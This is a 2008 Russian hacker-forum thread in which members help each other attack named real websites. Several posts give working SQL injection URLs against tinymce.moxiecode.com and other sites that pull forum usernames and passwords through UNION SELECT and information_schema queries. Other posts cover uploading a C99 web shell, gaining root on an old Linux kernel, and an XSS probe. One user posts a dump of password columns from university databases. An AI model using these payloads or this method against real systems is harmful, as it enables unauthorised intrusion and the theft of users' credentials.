Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем той таблицы, ты данных не получишь
     
    #3441 l-l00K, 5 Oct 2008
    Last edited: 5 Oct 2008
  2. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,database(),8/**/

    Название бд tinymce!
     
  3. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Название текущей БД tinymce, а БД где лежит tbl_user называется moxieforge
     
  4. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    geforce, я эти ссылки дал тебе не просто так. Если есть сплойты в паблике, то они есть там.
     
  5. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    34
    Likes Received:
    32
    Reputations:
    1
    Так вроде бы все хорошо но...
    Хочется достать логин и пасс форума

    Вот делаю запрос
    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+moxieforge.punbb_users+limit+1,1/*
    не проходит
    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce.punbb_users+limit+1,1/*
    Не проходит делаю запрос другой
    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/*
    не проходит

    Вопрос.
    Где же может валятся таблица с юзверями форума?
     
  6. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat(table_name,0x3a,table_schema),8+from+information_schema.tables/*
    punbb_users:tinymce_punbb
     
    2 people like this.
  7. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Почему не работает???

    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,user_password),8+from+tinymce.tinymce_punbb/**/
     
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Вот так наверное:

    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+tinymce_punbb.punbb_users
    punbb_users - таблица с пользователями
    tinymce_punbb - БД в которой лежит эта таблица
     
  9. dArKkNiGHt

    dArKkNiGHt Banned

    Joined:
    18 Aug 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    имеется сайт с sql injection. если у пользователся нет file_priv и адрес админки невозможно найти, то вообще бесполезно что-то пытаться сделать?

    к примеру хотел залишь шелл, но ведь нет прав на файлы у юзверя :(
    тоесть load_file()
    into dumpfile отказываются работать :(

    у юзера есть права только на одну базу данных. к mysql.user доступа не имеет
     
    #3449 dArKkNiGHt, 5 Oct 2008
    Last edited: 5 Oct 2008
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    dArKkNiGHt,

    https://forum.antichat.ru/threadnav34338-1-10.html

    Вот это попробуй. И поищи какой-нить форум, или гестбуку или хоть что-то, за что можно зацепица. И попробуй погуглить админку :)
     
    1 person likes this.
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25

    Я не говорил,что лоад фаил должен исполнять пхп код(нафига?).Я просто не понял,какой ты именно инклуд имел(я знаю только PHP include bug),и параллельно задал вопрос про лоад фаил.При запросе file_priv выводит Y,то бишь есть,а файлы не читаются(ни один) с помощью лоад файла,вот и всё.А спросил потому,что встретился с таким только пару раз.
     
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    Велемир, ну, тогда, сложно так сказать. Надо смотреть сайты сами. Если интересно - постучи в асю или скинь линки в личку - посмотрим что там :)
     
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ,интересуют ВСЕ возможные способы поднятия прав на шелле (кроме убийства админа или насылки на него порчи/сглаза/привода гипнотизёра и прочих мелких шалостей).Особенно интересные:).Версия ядра Linux 2.6.15-51-server :):).Шеллом практически пользовался в *праздничное* время,следовательно,опыт имею минимальный.(Второй шелл заливаю,чего же вы хотели))) ).Выслушаю все ваши предложения,идеи и пожелания.А также ссылки.

    ЗЫ: Забыл уточнить - шелл С99 2.0 :):).Вроде где-то валялась 2.4 в нэте,но это другая тема разговора :(:(:(
     
    #3453 Велемир, 6 Oct 2008
    Last edited: 6 Oct 2008
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Я бы и рад дать сайтег,но он не содержания аля пиво.ру ((.Придётся,видимо,разбираться самому(((.Всё равно спасибо :)
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    Велемир, юзай сплойт под это ядро. Оно довольно старое. Можешь опять же списаца со мной в асе - помогу. Или юзай milw0rm.com и packetstormsecurity.net

    з.ы. какой веб-шелл - значения не имеет. В любом случае для поднятия прав нужно ssh
     
    #3455 n0ne, 7 Oct 2008
    Last edited: 7 Oct 2008
  16. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    ok guys im sorry for bad russians

    but i need help pls

    course_enroll>course_enroll_pass>elearn
    dept_member>PASS>elearn
    members>PASS>elearn
    users>Password>elearn
    course_enroll>course_enroll_pass>fopme
    dept_member>PASS>fopme
    members>PASS>fopme
    users>Password>fopme
    mdl_course>password>mis
    mdl_course_request>password>mis
    mdl_hotpot>password>mis
    mdl_lesson>usepassword>mis
    mdl_lesson>password>mis
    mdl_lesson_default>usepassword>mis
    mdl_lesson_default>password>mis
    mdl_quiz>password>mis
    mdl_user>password>mis
    mdl_workshop>usepassword>mis
    mdl_workshop>password>mis
    course_enroll>course_enroll_pass>pharmacy
    dept_member>PASS>pharmacy
    faculty_users>Pass>pharmacy
    members>PASS>pharmacy
    users>Password>pharmacy
    members>PASS>qaumed
    members>PASS>qaumed_evaluation
    faculty>password>scuws
    faculty_copy>password>scuws
    members>PASS>scuws
    users>Password>scuws
    mdl_course>password>test
    mdl_course_request>password>test
    mdl_exercise>usepassword>test
    mdl_exercise>password>test
    mdl_groups>password>test
    mdl_hotpot>password>test
    mdl_lesson>usepassword>test
    mdl_lesson>password>test
    mdl_lesson_default>usepassword>test
    mdl_lesson_default>password>test
    mdl_quiz>password>test
    mdl_user>password>test
    mdl_workshop>usepassword>test
    mdl_workshop>password>test
    membersxx>PASS>test
    members>PASS>test

    i got this info but i need to get table to search
    what to use????????????????????????


    waitting>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
     
  17. Nofear

    Nofear New Member

    Joined:
    29 Mar 2006
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Как это можно использовать http://allsexcontact.ru:80/pages.php?id=<script>alert(39740,1099853472)</script>
     
  18. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    google - > cookie & XSS
     
  19. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    AHMED HASSAN
    wtf? make sure u can write atleast some lang. that is understandable and try to explain exactly what u need! what table? u mean to search?

    anyway if ur technological skillz are not enough developed to understand this, please read more of manual )

    Nofear
    например так

    Велемир
    metasploit?

    а вот мои непохеки:

    10к в сутки..)
     
    #3459 sabe, 7 Oct 2008
    Last edited: 7 Oct 2008
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    sabe
    --------------------
    Именно сдесь скули нет:
    http://www.gbcma.vic.gov.au/default.asp?ID=177&post=132'&tpl=news_full
    А вообще там с фильтрацией проблемы можно поискать другой параметр. База Access
    --------------------
    Это 3 ветка сравни
    http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version(),1,1)=3/*
    и
    http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version(),1,1)=3/*
    Видишь "About us" справа там где ошибка появлялась
    Или вот сдесь более наглядно:
    http://www.nfvcb.gov.ng/home_innerpages.php?pageid=39+and+substring(version(),1,1)=3&pagesectionid=7
    ----------------------
    Это не скуль
    http://www.wildberries.ru/news/detail.aspx?ID=69%27
    ----------------------
    Последняя: Портал работает на "Битрикс" можешь при желании поискать баги под неё :)
     
Loading...
Thread Status:
Not open for further replies.